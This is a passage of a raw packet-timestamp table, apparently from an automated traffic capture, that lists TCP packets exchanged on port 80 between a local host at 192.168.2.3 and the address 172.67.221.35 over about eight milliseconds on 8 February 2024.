                                                                                                                                                                    Feb 8, 2024 19:08:49.994642019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994654894 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994659901 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.994668961 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994683027 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994687080 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.994695902 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994709015 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.994709969 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994724035 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994738102 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.994746923 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.994772911 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995263100 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995312929 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995389938 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995403051 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995414019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995426893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995440006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995450974 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995452881 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995465994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995479107 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995481014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995493889 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995495081 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995523930 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995574951 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995589018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995600939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995613098 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995615959 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995625973 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995634079 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995640039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995654106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995667934 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995681047 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995683908 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995693922 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995707035 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995709896 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995722055 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.995731115 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.995749950 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996315002 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996328115 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996340990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996355057 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996365070 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996367931 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996382952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996387005 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996395111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996409893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996413946 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996423960 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996437073 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996438026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996452093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996464014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996478081 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996494055 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996505976 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996507883 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996520996 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996532917 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996534109 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996545076 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996558905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996561050 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996573925 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996586084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996588945 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996599913 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996609926 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.996613979 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.996648073 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997159004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997173071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997210979 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997222900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997236967 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997250080 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997260094 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997265100 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997287035 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997381926 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997426987 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997601986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997615099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997637033 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997651100 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997662067 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997663975 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997678995 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997692108 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997693062 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997705936 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997715950 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997720003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997733116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997745037 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997746944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997761011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997771978 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997775078 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997787952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997800112 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997802973 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997817039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997827053 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997831106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997843981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997857094 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997858047 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997874022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997883081 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.997895002 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.997912884 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998336077 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998349905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998363018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998377085 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998384953 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998406887 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998459101 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998472929 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998486996 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998498917 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998501062 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998526096 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998526096 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998541117 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998564005 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998709917 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998723030 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998735905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998749018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998758078 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998763084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998776913 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998776913 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998790026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998806953 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998809099 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998822927 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998830080 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998836994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998851061 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998866081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.998866081 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.998892069 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999326944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999377966 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999538898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999552965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999566078 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999577999 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999591112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999598026 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999608040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999618053 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999622107 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999635935 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999650002 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999650955 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999665976 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999680042 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999690056 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999695063 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999710083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999715090 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999723911 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999737024 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999737978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999752045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999766111 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999768019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999783039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999797106 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999797106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999810934 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999823093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.999836922 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.999861956 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000339985 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000354052 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000365973 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000380039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000390053 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000392914 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000406981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000420094 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000427008 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000453949 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000457048 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000469923 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000482082 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000484943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000499964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000510931 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000514984 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000530005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000539064 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000544071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000556946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000570059 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000576019 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000583887 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000595093 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000597954 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000611067 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000624895 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000626087 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000638962 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000659943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.000663996 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.000691891 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001317024 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001331091 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001346111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001358032 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001369953 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001372099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001384974 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001389980 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001399040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001414061 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001419067 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001427889 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001441002 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001442909 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001454115 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001466036 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001477003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001482010 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001488924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001503944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001509905 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001516104 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001528978 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001528978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001540899 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001547098 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001554012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001566887 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001574993 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001580000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001595020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.001605034 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.001622915 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002154112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002166986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002180099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002193928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002204895 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002207994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002223015 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002226114 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002271891 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002415895 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002429962 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002441883 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002454996 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002458096 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002481937 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002485991 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002495050 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002517939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002530098 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002532959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002554893 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002568007 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002582073 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002593994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002605915 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002610922 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002624989 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002633095 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002660990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002667904 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002675056 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002688885 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002712965 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002779007 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002793074 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002808094 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002820969 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002824068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002839088 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.002851009 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.002852917 CET8049717172.67.221.35192.168.2.3
